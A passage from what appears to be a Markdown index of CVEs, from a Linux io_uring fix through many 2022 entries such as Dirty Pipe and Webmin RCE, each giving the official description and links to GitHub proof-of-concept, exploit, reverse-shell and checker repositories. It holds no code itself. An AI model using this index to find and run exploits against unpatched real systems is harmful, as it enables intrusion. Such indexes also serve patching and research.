In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/af_unix: disable sending io_uring over sockets\n\nFile reference cycles have caused lots of problems for io_uring\nin the past, and it still doesn't work exactly right and races with\nunix_stream_read_generic(). The safest fix would be to completely\ndisallow sending io_uring files via sockets via SCM_RIGHT, so there\nare no possible cycles invloving registered files and thus rendering\nSCM accounting on the io_uring side unnecessary.
- [FoxyProxys/CVE-2023-52654](https://github.com/FoxyProxys/CVE-2023-52654)
### CVE-2023-52709
- [KevinMitchell-OSWP-CISSP/CVE-2023-52709-PoC](https://github.com/KevinMitchell-OSWP-CISSP/CVE-2023-52709-PoC)
## 2022
### CVE-2022-0155 (2022-01-10)
follow-redirects is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor
- [coana-tech/CVE-2022-0155-PoC](https://github.com/coana-tech/CVE-2022-0155-PoC)
### CVE-2022-0165 (2022-03-14)
The Page Builder KingComposer WordPress plugin through 2.9.6 does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action available to both unauthenticated and authenticated users
- [K3ysTr0K3R/CVE-2022-0165-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2022-0165-EXPLOIT)
- [Cappricio-Securities/CVE-2022-0165](https://github.com/Cappricio-Securities/CVE-2022-0165)
### CVE-2022-0185 (2022-02-11)
A heap-based buffer overflow flaw was found in the way the legacy_parse_param function in the Filesystem Context functionality of the Linux kernel verified the supplied parameters length. An unprivileged (in case of unprivileged user namespaces enabled, otherwise needs namespaced CAP_SYS_ADMIN privilege) local user able to open a filesystem that does not support the Filesystem Context API (and thus fallbacks to legacy handling) could use this flaw to escalate their privileges on the system.
- [Crusaders-of-Rust/CVE-2022-0185](https://github.com/Crusaders-of-Rust/CVE-2022-0185)
- [discordianfish/cve-2022-0185-crash-poc](https://github.com/discordianfish/cve-2022-0185-crash-poc)
- [khaclep007/CVE-2022-0185](https://github.com/khaclep007/CVE-2022-0185)
- [chenaotian/CVE-2022-0185](https://github.com/chenaotian/CVE-2022-0185)
- [veritas501/CVE-2022-0185-PipeVersion](https://github.com/veritas501/CVE-2022-0185-PipeVersion)
- [featherL/CVE-2022-0185-exploit](https://github.com/featherL/CVE-2022-0185-exploit)
- [dcheng69/CVE-2022-0185-Case-Study](https://github.com/dcheng69/CVE-2022-0185-Case-Study)
### CVE-2022-0219 (2022-01-20)
Improper Restriction of XML External Entity Reference in GitHub repository skylot/jadx prior to 1.3.2.
- [Haxatron/CVE-2022-0219](https://github.com/Haxatron/CVE-2022-0219)
### CVE-2022-0236 (2022-01-18)
The WP Import Export WordPress plugin (both free and premium versions) is vulnerable to unauthenticated sensitive data disclosure due to a missing capability check on the download function wpie_process_file_download found in the ~/includes/classes/class-wpie-general.php file. This made it possible for unauthenticated attackers to download any imported or exported information from a vulnerable site which can contain sensitive information like user data. This affects versions up to, and including, 3.9.15.
- [qurbat/CVE-2022-0236](https://github.com/qurbat/CVE-2022-0236)
- [xiska62314/CVE-2022-0236](https://github.com/xiska62314/CVE-2022-0236)
### CVE-2022-0265 (2022-03-03)
Improper Restriction of XML External Entity Reference in GitHub repository hazelcast/hazelcast in 5.1-BETA-1.
- [achuna33/CVE-2022-0265](https://github.com/achuna33/CVE-2022-0265)
### CVE-2022-0316 (2023-01-23)
The WeStand WordPress theme before 2.1, footysquare WordPress theme, aidreform WordPress theme, statfort WordPress theme, club-theme WordPress theme, kingclub-theme WordPress theme, spikes WordPress theme, spikes-black WordPress theme, soundblast WordPress theme, bolster WordPress theme from ChimpStudio and PixFill does not have any authorisation and upload validation in the lang_upload.php file, allowing any unauthenticated attacker to upload arbitrary files to the web server.
- [KTN1990/CVE-2022-0316_wordpress_multiple_themes_exploit](https://github.com/KTN1990/CVE-2022-0316_wordpress_multiple_themes_exploit)
### CVE-2022-0332 (2022-01-25)
A flaw was found in Moodle in versions 3.11 to 3.11.4. An SQL injection risk was identified in the h5p activity web service responsible for fetching user attempt data.
- [numanturle/CVE-2022-0332](https://github.com/numanturle/CVE-2022-0332)
### CVE-2022-0337 (2023-01-02)
Inappropriate implementation in File System API in Google Chrome on Windows prior to 97.0.4692.71 allowed a remote attacker to obtain potentially sensitive information via a crafted HTML page. (Chrome security severity: High)
- [Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera](https://github.com/Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera)
- [maldev866/ChExp-CVE-2022-0337-](https://github.com/maldev866/ChExp-CVE-2022-0337-)
- [zer0ne1/CVE-2022-0337-RePoC](https://github.com/zer0ne1/CVE-2022-0337-RePoC)
### CVE-2022-0412 (2022-02-28)
The TI WooCommerce Wishlist WordPress plugin before 1.40.1, TI WooCommerce Wishlist Pro WordPress plugin before 1.40.1 do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks
- [TcherB31/CVE-2022-0412_Exploit](https://github.com/TcherB31/CVE-2022-0412_Exploit)
### CVE-2022-0435 (2022-03-25)
A stack overflow flaw was found in the Linux kernel's TIPC protocol functionality in the way a user sends a packet with malicious content where the number of domain member nodes is higher than the 64 allowed. This flaw allows a remote user to crash the system or possibly escalate their privileges if they have access to the TIPC network.
- [wlswotmd/CVE-2022-0435](https://github.com/wlswotmd/CVE-2022-0435)
### CVE-2022-0439 (2022-03-07)
The Email Subscribers & Newsletters WordPress plugin before 5.3.2 does not correctly escape the `order` and `orderby` parameters to the `ajax_fetch_report_list` action, making it vulnerable to blind SQL injection attacks by users with roles as low as Subscriber. Further, it does not have any CSRF protection in place for the action, allowing an attacker to trick any logged in user to perform the action by clicking a link.
- [RandomRobbieBF/CVE-2022-0439](https://github.com/RandomRobbieBF/CVE-2022-0439)
### CVE-2022-0441 (2022-03-07)
The MasterStudy LMS WordPress plugin before 2.7.6 does to validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin
- [biulove0x/CVE-2022-0441](https://github.com/biulove0x/CVE-2022-0441)
- [SDragon1205/cve-2022-0441](https://github.com/SDragon1205/cve-2022-0441)
- [tegal1337/CVE-2022-0441](https://github.com/tegal1337/CVE-2022-0441)
- [kyukazamiqq/CVE-2022-0441](https://github.com/kyukazamiqq/CVE-2022-0441)
### CVE-2022-0482 (2022-03-09)
Exposure of Private Personal Information to an Unauthorized Actor in GitHub repository alextselegidis/easyappointments prior to 1.4.3.
- [Acceis/exploit-CVE-2022-0482](https://github.com/Acceis/exploit-CVE-2022-0482)
- [mija-pilkaite/CVE-2022-0482_exploit](https://github.com/mija-pilkaite/CVE-2022-0482_exploit)
### CVE-2022-0486 (2022-05-17)
Improper file permissions in the CommandPost, Collector, Sensor, and Sandbox components of Fidelis Network and Deception enables an attacker with local, administrative access to the CLI to modify affected files and enable escalation of privileges equivalent to the root user. The vulnerability is present in Fidelis Network and Deception versions prior to 9.4.5. Patches and updates are available to address this vulnerability.
- [henryreed/CVE-2022-0486](https://github.com/henryreed/CVE-2022-0486)
### CVE-2022-0492 (2022-03-03)
A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.
- [PaloAltoNetworks/can-ctr-escape-cve-2022-0492](https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492)
- [SofianeHamlaoui/CVE-2022-0492-Checker](https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker)
- [chenaotian/CVE-2022-0492](https://github.com/chenaotian/CVE-2022-0492)
- [bb33bb/CVE-2022-0492](https://github.com/bb33bb/CVE-2022-0492)
- [Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492](https://github.com/Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492)
- [yoeelingBin/CVE-2022-0492-Container-Escape](https://github.com/yoeelingBin/CVE-2022-0492-Container-Escape)
- [T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC](https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC)
### CVE-2022-0529 (2022-02-09)
A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution.
- [nanaao/unzip_poc](https://github.com/nanaao/unzip_poc)
- [ByteHackr/unzip_poc](https://github.com/ByteHackr/unzip_poc)
### CVE-2022-0540 (2022-04-20)
A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
- [Pear1y/CVE-2022-0540-RCE](https://github.com/Pear1y/CVE-2022-0540-RCE)
### CVE-2022-0543 (2022-02-18)
It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.
- [0x7eTeam/CVE-2022-0543](https://github.com/0x7eTeam/CVE-2022-0543)
- [z92g/CVE-2022-0543](https://github.com/z92g/CVE-2022-0543)
- [JacobEbben/CVE-2022-0543](https://github.com/JacobEbben/CVE-2022-0543)
- [SiennaSkies/redisHack](https://github.com/SiennaSkies/redisHack)
### CVE-2022-0591 (2022-03-21)
The FormCraft WordPress plugin before 3.8.28 does not validate the URL parameter in the formcraft3_get AJAX action, leading to SSRF issues exploitable by unauthenticated users
- [im-hanzou/FC3er](https://github.com/im-hanzou/FC3er)
### CVE-2022-0666 (2022-02-18)
CRLF Injection leads to Stack Trace Exposure due to lack of filtering at https://demo.microweber.org/ in Packagist microweber/microweber prior to 1.2.11.
- [keyboardancer/CVE-2022-0666](https://github.com/keyboardancer/CVE-2022-0666)
### CVE-2022-0725 (2022-03-07)
A flaw was found in keepass. The vulnerability occurs due to logging the plain text passwords in system log and leads to an Information Exposure vulnerability. This flaw allows an attacker to interact and read sensitive passwords and logs.
- [ByteHackr/keepass_poc](https://github.com/ByteHackr/keepass_poc)
### CVE-2022-0739 (2022-03-21)
The BookingPress WordPress plugin before 1.0.11 fails to properly sanitize user supplied POST data before it is used in a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection
- [destr4ct/CVE-2022-0739](https://github.com/destr4ct/CVE-2022-0739)
- [Chris01s/CVE-2022-0739](https://github.com/Chris01s/CVE-2022-0739)
- [BKreisel/CVE-2022-0739](https://github.com/BKreisel/CVE-2022-0739)
- [hadrian3689/wp_bookingpress_1.0.11](https://github.com/hadrian3689/wp_bookingpress_1.0.11)
- [G01d3nW01f/CVE-2022-0739](https://github.com/G01d3nW01f/CVE-2022-0739)
- [viardant/CVE-2022-0739](https://github.com/viardant/CVE-2022-0739)
- [ElGanz0/CVE-2022-0739](https://github.com/ElGanz0/CVE-2022-0739)
- [lhamouche/Bash-exploit-for-CVE-2022-0739](https://github.com/lhamouche/Bash-exploit-for-CVE-2022-0739)
### CVE-2022-0778 (2022-03-15)
The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).
- [drago-96/CVE-2022-0778](https://github.com/drago-96/CVE-2022-0778)
- [yywing/cve-2022-0778](https://github.com/yywing/cve-2022-0778)
- [jkakavas/CVE-2022-0778-POC](https://github.com/jkakavas/CVE-2022-0778-POC)
- [0xUhaw/CVE-2022-0778](https://github.com/0xUhaw/CVE-2022-0778)
- [Trinadh465/openssl-1.1.1g_CVE-2022-0778](https://github.com/Trinadh465/openssl-1.1.1g_CVE-2022-0778)
- [jeongjunsoo/CVE-2022-0778](https://github.com/jeongjunsoo/CVE-2022-0778)
- [hshivhare67/OpenSSL_1.0.1g_CVE-2022-0778](https://github.com/hshivhare67/OpenSSL_1.0.1g_CVE-2022-0778)
### CVE-2022-0811 (2022-03-16)
A flaw was found in CRI-O in the way it set kernel options for a pod. This issue allows anyone with rights to deploy a pod on a Kubernetes cluster that uses the CRI-O runtime to achieve a container escape and arbitrary code execution as root on the cluster node, where the malicious pod was deployed.
- [spiarh/webhook-cve-2022-0811](https://github.com/spiarh/webhook-cve-2022-0811)
### CVE-2022-0824 (2022-03-02)
Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.
- [faisalfs10x/Webmin-CVE-2022-0824-revshell](https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell)
- [honypot/CVE-2022-0824](https://github.com/honypot/CVE-2022-0824)
- [pizza-power/golang-webmin-CVE-2022-0824-revshell](https://github.com/pizza-power/golang-webmin-CVE-2022-0824-revshell)
- [gokul-ramesh/WebminRCE-exploit](https://github.com/gokul-ramesh/WebminRCE-exploit)
### CVE-2022-0847 (2022-03-07)
A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system.
- [bbaranoff/CVE-2022-0847](https://github.com/bbaranoff/CVE-2022-0847)
- [xndpxs/CVE-2022-0847](https://github.com/xndpxs/CVE-2022-0847)
- [r1is/CVE-2022-0847](https://github.com/r1is/CVE-2022-0847)
- [Arinerron/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit)
- [2xYuan/CVE-2022-0847](https://github.com/2xYuan/CVE-2022-0847)
- [crowsec-edtech/Dirty-Pipe](https://github.com/crowsec-edtech/Dirty-Pipe)
- [lucksec/CVE-2022-0847](https://github.com/lucksec/CVE-2022-0847)
- [si1ent-le/CVE-2022-0847](https://github.com/si1ent-le/CVE-2022-0847)
- [bohr777/cve-2022-0847dirtypipe-exploit](https://github.com/bohr777/cve-2022-0847dirtypipe-exploit)
- [ZZ-SOCMAP/CVE-2022-0847](https://github.com/ZZ-SOCMAP/CVE-2022-0847)
- [cspshivam/CVE-2022-0847-dirty-pipe-exploit](https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit)
- [febinrev/dirtypipez-exploit](https://github.com/febinrev/dirtypipez-exploit)
- [ahrixia/CVE_2022_0847](https://github.com/ahrixia/CVE_2022_0847)
- [knqyf263/CVE-2022-0847](https://github.com/knqyf263/CVE-2022-0847)
- [puckiestyle/CVE-2022-0847](https://github.com/puckiestyle/CVE-2022-0847)
- [0xIronGoat/dirty-pipe](https://github.com/0xIronGoat/dirty-pipe)
- [ITMarcin2211/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/ITMarcin2211/CVE-2022-0847-DirtyPipe-Exploit)
- [mrchucu1/CVE-2022-0847-Docker](https://github.com/mrchucu1/CVE-2022-0847-Docker)
- [basharkey/CVE-2022-0847-dirty-pipe-checker](https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker)
- [4luc4rdr5290/CVE-2022-0847](https://github.com/4luc4rdr5290/CVE-2022-0847)
- [dadhee/CVE-2022-0847_DirtyPipeExploit](https://github.com/dadhee/CVE-2022-0847_DirtyPipeExploit)
- [Greetdawn/CVE-2022-0847-DirtyPipe](https://github.com/Greetdawn/CVE-2022-0847-DirtyPipe)
- [Al1ex/CVE-2022-0847](https://github.com/Al1ex/CVE-2022-0847)
- [Mustafa1986/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/Mustafa1986/CVE-2022-0847-DirtyPipe-Exploit)
- [nanaao/Dirtypipe-exploit](https://github.com/nanaao/Dirtypipe-exploit)
- [AyoubNajim/cve-2022-0847dirtypipe-exploit](https://github.com/AyoubNajim/cve-2022-0847dirtypipe-exploit)
- [pentestblogin/pentestblog-CVE-2022-0847](https://github.com/pentestblogin/pentestblog-CVE-2022-0847)
- [gyaansastra/CVE-2022-0847](https://github.com/gyaansastra/CVE-2022-0847)
- [DataDog/dirtypipe-container-breakout-poc](https://github.com/DataDog/dirtypipe-container-breakout-poc)
- [babyshen/CVE-2022-0847](https://github.com/babyshen/CVE-2022-0847)
- [edsonjt81/CVE-2022-0847-Linux](https://github.com/edsonjt81/CVE-2022-0847-Linux)
- [chenaotian/CVE-2022-0847](https://github.com/chenaotian/CVE-2022-0847)
- [V0WKeep3r/CVE-2022-0847-DirtyPipe-Exploit](https://github.com/V0WKeep3r/CVE-2022-0847-DirtyPipe-Exploit)
- [al4xs/CVE-2022-0847-Dirty-Pipe](https://github.com/al4xs/CVE-2022-0847-Dirty-Pipe)
- [Greetdawn/CVE-2022-0847-DirtyPipe-](https://github.com/Greetdawn/CVE-2022-0847-DirtyPipe-)
- [crusoe112/DirtyPipePython](https://github.com/crusoe112/DirtyPipePython)
- [nanaao/dirtyPipe-automaticRoot](https://github.com/nanaao/dirtyPipe-automaticRoot)
- [arttnba3/CVE-2022-0847](https://github.com/arttnba3/CVE-2022-0847)
- [AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits)
- [sa-infinity8888/Dirty-Pipe-CVE-2022-0847](https://github.com/sa-infinity8888/Dirty-Pipe-CVE-2022-0847)
- [realbatuhan/dirtypipetester](https://github.com/realbatuhan/dirtypipetester)
- [CYB3RK1D/CVE-2022-0847-POC](https://github.com/CYB3RK1D/CVE-2022-0847-POC)
- [breachnix/dirty-pipe-poc](https://github.com/breachnix/dirty-pipe-poc)
- [Shotokhan/cve_2022_0847_shellcode](https://github.com/Shotokhan/cve_2022_0847_shellcode)
- [githublihaha/DirtyPIPE-CVE-2022-0847](https://github.com/githublihaha/DirtyPIPE-CVE-2022-0847)
- [MrP1xel/CVE-2022-0847-dirty-pipe-kernel-checker](https://github.com/MrP1xel/CVE-2022-0847-dirty-pipe-kernel-checker)
- [jpts/CVE-2022-0847-DirtyPipe-Container-Breakout](https://github.com/jpts/CVE-2022-0847-DirtyPipe-Container-Breakout)
- [LudovicPatho/CVE-2022-0847_dirty-pipe](https://github.com/LudovicPatho/CVE-2022-0847_dirty-pipe)
- [DanaEpp/pwncat_dirtypipe](https://github.com/DanaEpp/pwncat_dirtypipe)
- [tmoneypenny/CVE-2022-0847](https://github.com/tmoneypenny/CVE-2022-0847)
- [scopion/dirty-pipe](https://github.com/scopion/dirty-pipe)
- [stfnw/Debugging_Dirty_Pipe_CVE-2022-0847](https://github.com/stfnw/Debugging_Dirty_Pipe_CVE-2022-0847)
- [drapl0n/dirtypipe](https://github.com/drapl0n/dirtypipe)
- [mhanief/dirtypipe](https://github.com/mhanief/dirtypipe)
- [tufanturhan/CVE-2022-0847-L-nux-PrivEsc](https://github.com/tufanturhan/CVE-2022-0847-L-nux-PrivEsc)
- [rexpository/linux-privilege-escalation](https://github.com/rexpository/linux-privilege-escalation)
- [CPT-Jack-A-Castle/CVE-2022-0847](https://github.com/CPT-Jack-A-Castle/CVE-2022-0847)
- [isaiahsimeone/COMP3320-VAPT](https://github.com/isaiahsimeone/COMP3320-VAPT)
- [VinuKalana/DirtyPipe-CVE-2022-0847](https://github.com/VinuKalana/DirtyPipe-CVE-2022-0847)
- [ih3na/debian11-dirty_pipe-patcher](https://github.com/ih3na/debian11-dirty_pipe-patcher)
- [greenhandatsjtu/CVE-2022-0847-Container-Escape](https://github.com/greenhandatsjtu/CVE-2022-0847-Container-Escape)
- [jxpsx/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/jxpsx/CVE-2022-0847-DirtyPipe-Exploits)
- [Asbatel/CBDS_CVE-2022-0847_POC](https://github.com/Asbatel/CBDS_CVE-2022-0847_POC)
- [airbus-cert/dirtypipe-ebpf_detection](https://github.com/airbus-cert/dirtypipe-ebpf_detection)
- [edr1412/Dirty-Pipe](https://github.com/edr1412/Dirty-Pipe)
- [eduquintanilha/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/eduquintanilha/CVE-2022-0847-DirtyPipe-Exploits)
- [EagleTube/CVE-2022-0847](https://github.com/EagleTube/CVE-2022-0847)
- [yoeelingBin/CVE-2022-0847-Container-Escape](https://github.com/yoeelingBin/CVE-2022-0847-Container-Escape)
- [notl0cal/dpipe](https://github.com/notl0cal/dpipe)
- [Gustavo-Nogueira/Dirty-Pipe-Exploits](https://github.com/Gustavo-Nogueira/Dirty-Pipe-Exploits)
- [b4dboy17/Dirty-Pipe-Oneshot](https://github.com/b4dboy17/Dirty-Pipe-Oneshot)
- [edsonjt81/CVE-2022-0847-DirtyPipe-](https://github.com/edsonjt81/CVE-2022-0847-DirtyPipe-)
- [Turzum/ps-lab-cve-2022-0847](https://github.com/Turzum/ps-lab-cve-2022-0847)
- [qwert419/linux-](https://github.com/qwert419/linux-)
- [DataFox/CVE-2022-0847](https://github.com/DataFox/CVE-2022-0847)
- [pmihsan/Dirty-Pipe-CVE-2022-0847](https://github.com/pmihsan/Dirty-Pipe-CVE-2022-0847)
- [ajith737/Dirty-Pipe-CVE-2022-0847-POCs](https://github.com/ajith737/Dirty-Pipe-CVE-2022-0847-POCs)
- [mutur4/CVE-2022-0847](https://github.com/mutur4/CVE-2022-0847)
- [orsuprasad/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/orsuprasad/CVE-2022-0847-DirtyPipe-Exploits)
- [JlSakuya/CVE-2022-0847-container-escape](https://github.com/JlSakuya/CVE-2022-0847-container-escape)
- [jonathanbest7/cve-2022-0847](https://github.com/jonathanbest7/cve-2022-0847)
- [0xeremus/dirty-pipe-poc](https://github.com/0xeremus/dirty-pipe-poc)
- [h4ckm310n/CVE-2022-0847-eBPF](https://github.com/h4ckm310n/CVE-2022-0847-eBPF)
- [joeymeech/CVE-2022-0847-Exploit-Implementation](https://github.com/joeymeech/CVE-2022-0847-Exploit-Implementation)
- [pashayogi/DirtyPipe](https://github.com/pashayogi/DirtyPipe)
- [n3rada/DirtyPipe](https://github.com/n3rada/DirtyPipe)
- [ayushx007/CVE-2022-0847-dirty-pipe-checker](https://github.com/ayushx007/CVE-2022-0847-dirty-pipe-checker)
- [ayushx007/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/ayushx007/CVE-2022-0847-DirtyPipe-Exploits)
- [solomon12354/LockingGirl-----CVE-2022-0847-Dirty_Pipe_virus](https://github.com/solomon12354/LockingGirl-----CVE-2022-0847-Dirty_Pipe_virus)
- [letsr00t/CVE-2022-0847](https://github.com/letsr00t/CVE-2022-0847)
- [xsxtw/CVE-2022-0847](https://github.com/xsxtw/CVE-2022-0847)
- [muhammad1596/CVE-2022-0847-dirty-pipe-checker](https://github.com/muhammad1596/CVE-2022-0847-dirty-pipe-checker)
- [muhammad1596/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/muhammad1596/CVE-2022-0847-DirtyPipe-Exploits)
### CVE-2022-0848 (2022-03-04)
OS Command Injection in GitHub repository part-db/part-db prior to 0.5.11.
- [dskmehra/CVE-2022-0848](https://github.com/dskmehra/CVE-2022-0848)
- [Lay0us/CVE-2022-0848-RCE](https://github.com/Lay0us/CVE-2022-0848-RCE)
### CVE-2022-0853 (2022-03-11)
A flaw was found in JBoss-client. The vulnerability occurs due to a memory leak on the JBoss client-side, when using UserTransaction repeatedly and leads to information leakage vulnerability.
- [ByteHackr/CVE-2022-0853](https://github.com/ByteHackr/CVE-2022-0853)
### CVE-2022-0918 (2022-03-16)
A vulnerability was discovered in the 389 Directory Server that allows an unauthenticated attacker with network access to the LDAP port to cause a denial of service. The denial of service is triggered by a single message sent over a TCP connection, no bind or other authentication is required. The message triggers a segmentation fault that results in slapd crashing.\n\n
- [NathanMulbrook/CVE-2022-0918](https://github.com/NathanMulbrook/CVE-2022-0918)
### CVE-2022-0944 (2022-03-15)
Template injection in connection test endpoint leads to RCE in GitHub repository sqlpad/sqlpad prior to 6.10.1.
- [shhrew/CVE-2022-0944](https://github.com/shhrew/CVE-2022-0944)
- [Philip-Otter/CVE-2022-0944_RCE_Automation](https://github.com/Philip-Otter/CVE-2022-0944_RCE_Automation)
- [FlojBoj/CVE-2022-0944](https://github.com/FlojBoj/CVE-2022-0944)
- [0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944](https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944)
- [Robocopsita/CVE-2022-0944_RCE_POC](https://github.com/Robocopsita/CVE-2022-0944_RCE_POC)
- [toneillcodes/CVE-2022-0944](https://github.com/toneillcodes/CVE-2022-0944)
- [TanveerS1ngh/SQLPad-6.10.0-Exploit-CVE-2022-0944](https://github.com/TanveerS1ngh/SQLPad-6.10.0-Exploit-CVE-2022-0944)
### CVE-2022-0952 (2022-05-02)
The Sitemap by click5 WordPress plugin before 1.0.36 does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as the users_can_register and default_role, allowing them to create a new admin account and take over the blog.
- [RandomRobbieBF/CVE-2022-0952](https://github.com/RandomRobbieBF/CVE-2022-0952)
### CVE-2022-0995 (2022-03-25)
An out-of-bounds (OOB) memory write flaw was found in the Linux kernel’s watch_queue event notification subsystem. This flaw can overwrite parts of the kernel state, potentially allowing a local user to gain privileged access or cause a denial of service on the system.
- [Bonfee/CVE-2022-0995](https://github.com/Bonfee/CVE-2022-0995)
- [AndreevSemen/CVE-2022-0995](https://github.com/AndreevSemen/CVE-2022-0995)
- [1nzag/CVE-2022-0995](https://github.com/1nzag/CVE-2022-0995)
### CVE-2022-0997 (2022-05-17)
Improper file permissions in the CommandPost, Collector, and Sensor components of Fidelis Network and Deception enables an attacker with local, administrative access to the CLI to modify affected script files, which could result in arbitrary commands being run as root upon subsequent logon by a root user. The vulnerability is present in Fidelis Network and Deception versions prior to 9.4.5. Patches and updates are available to address this vulnerability.
- [henryreed/CVE-2022-0997](https://github.com/henryreed/CVE-2022-0997)
### CVE-2022-1011 (2022-03-18)
A use-after-free flaw was found in the Linux kernel’s FUSE filesystem in the way a user triggers write(). This flaw allows a local user to gain unauthorized access to data from the FUSE filesystem, resulting in privilege escalation.
- [xkaneiki/CVE-2022-1011](https://github.com/xkaneiki/CVE-2022-1011)
### CVE-2022-1012 (2022-08-05)
A memory leak problem was found in the TCP source port generation algorithm in net/ipv4/tcp.c due to the small table perturb size. This flaw may allow an attacker to information leak and may cause a denial of service problem.
- [nanopathi/Linux-4.19.72_CVE-2022-1012](https://github.com/nanopathi/Linux-4.19.72_CVE-2022-1012)
### CVE-2022-1015 (2022-04-29)
A flaw was found in the Linux kernel in linux/net/netfilter/nf_tables_api.c of the netfilter subsystem. This flaw allows a local user to cause an out-of-bounds write issue.
- [pqlx/CVE-2022-1015](https://github.com/pqlx/CVE-2022-1015)
- [zanezhub/CVE-2022-1015-1016](https://github.com/zanezhub/CVE-2022-1015-1016)
- [shuttterman/bob_kern_exp1](https://github.com/shuttterman/bob_kern_exp1)
- [ysanatomic/CVE-2022-1015](https://github.com/ysanatomic/CVE-2022-1015)
- [wlswotmd/CVE-2022-1015](https://github.com/wlswotmd/CVE-2022-1015)
- [delsploit/CVE-2022-1015](https://github.com/delsploit/CVE-2022-1015)
- [pivik271/CVE-2022-1015](https://github.com/pivik271/CVE-2022-1015)
- [more-kohii/CVE-2022-1015](https://github.com/more-kohii/CVE-2022-1015)
- [0range1337/CVE-2022-1015](https://github.com/0range1337/CVE-2022-1015)
- [seadragnol/CVE-2022-1015](https://github.com/seadragnol/CVE-2022-1015)
### CVE-2022-1026 (2022-04-04)
Kyocera multifunction printers running vulnerable versions of Net View unintentionally expose sensitive user information, including usernames and passwords, through an insufficiently protected address book export function.
- [ac3lives/kyocera-cve-2022-1026](https://github.com/ac3lives/kyocera-cve-2022-1026)
- [flamebarke/nmap-printer-nse-scripts](https://github.com/flamebarke/nmap-printer-nse-scripts)
- [r0lh/kygocera](https://github.com/r0lh/kygocera)
### CVE-2022-1040 (2022-03-25)
An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older.
- [killvxk/CVE-2022-1040](https://github.com/killvxk/CVE-2022-1040)
- [jam620/Sophos-Vulnerability](https://github.com/jam620/Sophos-Vulnerability)
- [Keith-amateur/cve-2022-1040](https://github.com/Keith-amateur/cve-2022-1040)
- [jackson5sec/CVE-2022-1040](https://github.com/jackson5sec/CVE-2022-1040)
- [michealadams30/CVE-2022-1040](https://github.com/michealadams30/CVE-2022-1040)
